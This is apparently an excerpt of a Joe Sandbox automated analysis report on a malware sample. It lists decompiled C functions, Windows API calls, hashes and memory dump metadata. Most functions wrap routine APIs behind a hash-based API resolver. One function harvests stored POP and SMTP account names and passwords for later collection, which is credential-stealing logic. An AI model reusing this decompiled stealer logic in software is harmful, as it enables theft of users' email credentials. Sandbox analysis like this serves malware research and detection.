                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                  0x00403bfc
                  0x00403c04
                  0x00403c07

                  APIs
                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                  0x00403bc4
                  0x00403bcc
                  0x00403bcf

                  APIs
                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                  0x00404a0d
                  0x00404a15
                  0x00404a18

                  APIs
                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                  0x00403b72
                  0x00403b7a
                  0x00403b7d

                  APIs
                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID:
                  • API String ID: 1174141254-0
                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: closesocket
                  • String ID:
                  • API String ID: 2781271927-0
                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                  0x00403fac
                  0x00403fba
                  0x00403fbe

                  APIs
                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                  0x0040647f
                  0x00406487
                  0x0040648a

                  APIs
                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                  0x004058f8
                  0x00405903
                  0x00405906

                  APIs
                  • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                  • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                  • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                  • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                  0x00405932
                  0x0040593d
                  0x00405940

                  APIs
                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                  0x0040d070
                  0x0040d080
                  0x0040d084
                  0x0040d086
                  0x0040d08c
                  0x0040d0a0
                  0x0040d0ae
                  0x0040d0bd
                  0x0040d0c0
                  0x0040d0c5
                  0x0040d0c9
                  0x0040d0e3
                  0x0040d0f2
                  0x0040d101
                  0x0040d104
                  0x0040d109
                  0x0040d110
                  0x0040d11e
                  0x0040d123
                  0x0040d126
                  0x0040d12d
                  0x0040d145
                  0x0040d154
                  0x0040d15a
                  0x0040d166
                  0x0040d174
                  0x0040d186
                  0x0040d18e
                  0x0040d19a
                  0x0040d1ac
                  0x0040d1ba
                  0x0040d1cc
                  0x0040d1d1
                  0x0040d1dd
                  0x0040d1e2
                  0x0040d1e7
                  0x0040d1e7
                  0x0040d1e7
                  0x0040d1eb
                  0x0040d1f1
                  0x0040d1f7
                  0x0040d1ff
                  0x0040d207
                  0x0040d20f
                  0x0040d217
                  0x0040d21f
                  0x0040d227
                  0x0040d230

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 0-2111798378
                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040438F
                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                  • VariantInit.OLEAUT32(?), ref: 004043C4
                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                  • VariantInit.OLEAUT32(?), ref: 00404414
                  • SysAllocString.OLEAUT32(?), ref: 00404419
                  • VariantInit.OLEAUT32(?), ref: 00404431
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                  • String ID:
                  • API String ID: 1312198159-0
                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                  Uniqueness

                  Uniqueness Score: -1.00%